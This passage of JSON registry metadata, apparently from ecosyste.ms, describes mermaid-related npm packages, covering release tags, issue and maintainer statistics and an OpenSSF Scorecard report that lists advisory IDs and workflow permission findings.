js%2Fmermaid/tags/0.2.7/manifests"},{"name":"0.2.6","sha":"9a35844731426e1f74f64d272ae6398f20424457","kind":"commit","published_at":"2014-11-27T20:28:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.6/manifests"},{"name":"0.2.5","sha":"18be0e02aa80dcad171b26d2e397750100dc7d23","kind":"commit","published_at":"2014-11-27T20:16:17.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.5/manifests"},{"name":"0.2.4","sha":"9c31ac8aa68bff142e33b63b5ca3217aa8db7f5a","kind":"commit","published_at":"2014-11-25T21:58:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.4/manifests"},{"name":"0.2.3","sha":"d18103a0ec61801ac437a46cecaec81628037bb2","kind":"commit","published_at":"2014-11-24T21:03:32.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.3/manifests"},{"name":"0.2.2","sha":"cb58aeab2532be6d8bc1eab6503ca752fcf85965","kind":"commit","published_at":"2014-11-22T18:06:04.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.2/manifests"},{"name":"0.2.1","sha":"c0a4cfc2d768a7fe0a5d442635b7590054577eeb","kind":"commit","published_at":"2014-11-22T17:36:02.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.1/manifests"},{"name":"0.2.0","sha":"83de219552e39f8ed19a2300f215e1159abcfb33","kind":"commit","published_at":"2014-11-22T16:29:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.2.0/manifests"},{"name":"0.1.1","sha":"64bedc8262b6e116c344de10968e78a06323d304","kind":"commit","published_at":"2014-11-17T06:50:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.1/manifests"},{"name":"0.1.0","sha":"46b45a820976091d3dcf1d99c6a4e8a35e7d9ade","kind":"tag","published_at":"2014-11-16T19:32:58.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/0.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/0.1.0/manifests"}]},"repo_metadata_updated_at":"2025-09-01T14:17:50.396Z","dependent_packages_count":0,"downloads":39,"downloads_period":"last-month","dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":24.931592808528446,"dependent_packages_count":36.0573762110116,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":30.494484509770025},"purl":"pkg:npm/%40jeswr/mermaid","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/@jeswr/mermaid","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/@jeswr/mermaid","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/@jeswr/mermaid/dependencies","status":null,"funding_links":["https://github.com/sponsors/knsv","https://github.com/sponsors/sidharthv96"],"critical":null,"issue_metadata":{"last_synced_at":"2025-09-01T14:01:58.757Z","issues_count":1461,"pull_requests_count":1558,"avg_time_to_close_issue":27677984.852564104,"avg_time_to_close_pull_request":2277072.9893004117,"issues_closed_count":466,"pull_requests_closed_count":1215,"pull_request_authors_count":359,"issue_authors_count":1156,"avg_comments_per_issue":3.5578370978781657,"avg_comments_per_pull_request":4.093709884467266,"merged_pull_requests_count":970,"bot_issues_count":4,"bot_pull_requests_count":290,"past_year_issues_count":428,"past_year_pull_requests_count":712,"past_year_avg_time_to_close_issue":2790098.3866666667,"past_year_avg_time_to_close_pull_request":1391392.070539419,"past_year_issues_closed_count":75,"past_year_pull_requests_closed_count":482,"past_year_pull_request_authors_count":162,"past_year_issue_authors_count":345,"past_year_avg_comments_per_issue":0.7616822429906542,"past_year_avg_comments_per_pull_request":4.254213483146067,"past_year_bot_issues_count":2,"past_year_bot_pull_requests_count":155,"past_year_merged_pull_requests_count":374,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/issues","maintainers":[{"login":"sidharthv96","count":251,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"huynhicode","count":72,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"knsv","count":57,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"aloisklink","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"Yokozuna59","count":27,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yokozuna59"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"ashishjain0512","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"Yash-Singh1","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Yash-Singh1"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"NicolasNewman","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"GDFaber","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/GDFaber"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"tylerlong","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/tylerlong"}],"active_maintainers":[{"login":"sidharthv96","count":48,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sidharthv96"},{"login":"knsv","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/knsv"},{"login":"saurabhg772244","count":25,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/saurabhg772244"},{"login":"huynhicode","count":22,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/huynhicode"},{"login":"ashishjain0512","count":17,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashishjain0512"},{"login":"yari-dewalt","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/yari-dewalt"},{"login":"aloisklink","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aloisklink"},{"login":"omkarht","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/omkarht"},{"login":"rajat-ht","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rajat-ht"},{"login":"shubhamparikh2704","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubhamparikh2704"},{"login":"NicolasNewman","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/NicolasNewman"},{"login":"IOrlandoni","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/IOrlandoni"},{"login":"kedar49","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kedar49"},{"login":"shubham-mermaid","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shubham-mermaid"},{"login":"darshanr0107","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/darshanr0107"},{"login":"Prashant-7718","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Prashant-7718"},{"login":"ferozmht","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ferozmht"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@jeswr%2Fmermaid/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@jeswr%2Fmermaid/version_numbers","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@jeswr%2Fmermaid/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@jeswr%2Fmermaid/related_packages","maintainers":[{"uuid":"jeswr","login":"jeswr","name":null,"email":"jmwright.045@gmail.com","url":null,"packages_count":613,"html_url":"https://www.npmjs.com/~jeswr","role":null,"created_at":"2025-03-02T14:59:37.976Z","updated_at":"2025-03-02T14:59:37.976Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/jeswr/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5131348,"maintainers_count":1051627,"namespaces_count":313328,"keywords_count":730052,"github":"npm","metadata":{"funded_packages_count":155759},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2025-09-05T07:36:50.205Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":11863497,"name":"@mermaid-js/examples","ecosystem":"npm","description":"Mermaid examples package","homepage":"https://github.com/mermaid-js/mermaid#readme","licenses":"mit","normalized_licenses":["MIT"],"repository_url":"https://github.com/mermaid-js/mermaid","keywords_array":[],"namespace":"mermaid-js","versions_count":2,"first_release_published_at":"2025-04-20T08:10:29.310Z","latest_release_published_at":"2025-07-16T14:24:58.421Z","latest_release_number":"1.0.0","last_synced_at":"2025-09-01T12:55:58.149Z","created_at":"2025-07-02T10:40:35.616Z","updated_at":"2025-09-01T14:17:50.397Z","registry_url":"https://www.npmjs.com/package/@mermaid-js/examples","install_command":"npm install @mermaid-js/examples","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"beta":"0.0.1-beta.1","latest":"1.0.0"}},"repo_metadata":{"id":37269779,"uuid":"26066727","full_name":"mermaid-js/mermaid","owner":"mermaid-js","description":"Generation of diagrams like flowcharts or sequence diagrams from text in a similar manner as markdown","archived":false,"fork":false,"pushed_at":"2025-09-01T12:33:10.000Z","size":254429,"stargazers_count":82566,"open_issues_count":1425,"forks_count":7984,"subscribers_count":651,"default_branch":"develop","last_synced_at":"2025-09-01T12:37:01.437Z","etag":null,"topics":["diagrams","diagrams-as-code","documentation","flowchart","javascript","mindmap","typescript","uml-diagrams"],"latest_commit_sha":null,"homepage":"https://mermaid.js.org","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mermaid-js.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["knsv","sidharthv96"]}},"created_at":"2014-11-01T23:52:32.000Z","updated_at":"2025-09-01T12:31:32.000Z","dependencies_parsed_at":"2023-09-29T07:58:18.084Z","dependency_job_id":"8c149ccb-df9c-4cb4-9e51-2f99157720cd","html_url":"https://github.com/mermaid-js/mermaid","commit_stats":{"total_commits":8230,"total_committers":688,"mean_commits":"11.962209302325581","dds":0.823086269744836,"last_synced_commit":"b3dee343d1536c8425539643c345a63ff58f59f4"},"previous_names":["knsv/mermaid"],"tags_count":181,"template":false,"template_full_name":null,"purl":"pkg:github/mermaid-js/mermaid","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/refs/heads/develop","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/sbom","scorecard":{"id":355670,"data":{"date":"2025-08-17T15:35:22Z","repo":{"name":"github.com/mermaid-js/mermaid","commit":"1f46c9e9bb556f9c321118407d0fa6788746e8b9"},"scorecard":{"version":"v5.1.1","commit":"cd152cb6742c5b8f2f3d2b5193b41d9c50905198"},"score":6.7,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#packaging"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#code-review"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:23","Info: jobLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:21","Info: jobLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:21","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/build-docs.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/check-readme-in-sync.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e-applitools.yml:17","Warn: topLevel 'contents' permission set to 'write': .github/workflows/e2e-timings.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/issue-triage.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:23","Warn: topLevel 'contents' permission set to 'write': .github/workflows/lint.yml:12","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/publish-docs.yml:11","Warn: no topLevel permission defined: .github/workflows/release-preview-publish.yml:1","Warn: topLevel 'actions' permission set to 'write': .github/workflows/release-preview.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/release.yml:11","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:9","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:6","Warn: no topLevel permission defined: .github/workflows/unlock-reopened-issues.yml:1","Warn: no topLevel permission defined: .github/workflows/update-browserlist.yml:1","Warn: no topLevel permission defined: .github/workflows/validate-lockfile.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: npmCommand not pinned by hash: .github/workflows/release-preview-publish.yml:32","Info:  45 out of  47 GitHub-owned GitHubAction dependencies pinned","Info:  35 out of  36 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#signed-releases"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#license"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 28 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#sast"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found linked content: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found text in security policy: github.com/mermaid-js/.github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#security-policy"}},{"name":"Branch-Protection","score":1,"reason":"branch protection is not maximal on development and all release branches","details":["Warn: branch protection not enabled for branch 'release/10.9.3'","Warn: branch protection not enabled for branch 'release/10.9.2'","Info: 'allow deletion' disabled on branch 'develop'","Info: 'force pushes' disabled on branch 'develop'","Warn: branch 'develop' does not require approvers","Warn: codeowners review is not required on branch 'develop'","Info: status check found to merge onto on branch 'develop'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":9,"reason":"11 out of 12 merged PRs checked by a CI test -- score normalized to 9","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 15 contributing companies or organizations","details":["Info: found contributions from: Mermaid-Chart, OSDKDev, argoproj, check-spelling, evolutionizer, fossgect, garnercorp, gecthrissur, john deere, mermaid chart, mermaid-chart, mermaid-js, plantuml-stdlib, ringcentral, sarva"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":0,"reason":"23 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-968p-4wvh-cqc8","Warn: Project is vulnerable to: GHSA-xffm-g5w8-qvg7","Warn: Project is vulnerable to: GHSA-jr5f-v2jv-69x6","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-mg2h-6x62-wpwc","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4www-5p9h-95mh","Warn: Project is vulnerable to: GHSA-9gqv-wp59-fq42","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-c76h-2ccp-4975","Warn: Project is vulnerable to: GHSA-cxrh-j4jr-qwg3","Warn: Project is vulnerable to: GHSA-x574-m823-4x7w","Warn: Project is vulnerable to: GHSA-4r4m-qw57-chr8","Warn: Project is vulnerable to: GHSA-xcj6-pq6g-qj4x","Warn: Project is vulnerable to: GHSA-356w-63v5-8wf4","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T09:31:17.427Z","repository_id":37269779,"created_at":"2025-08-18T09:31:17.427Z","updated_at":"2025-08-18T09:31:17.427Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273137429,"owners_count":25052011,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-01T02:00:09.058Z","response_time":120,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"mermaid-js","name":"mermaid-js","uuid":"57169982","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":"mermaidjs_","company":null,"icon_url":"https://avatars.githubusercontent.com/u/57169982?v=4","repositories_count":11,"last_synced_at":"2023-04-08T11:47:59.066Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/mermaid-js","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-14T05:34:15.747Z","updated_at":"2023-04-08T11:47:59.094Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js/repositories"},"tags":[{"name":"mermaid@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11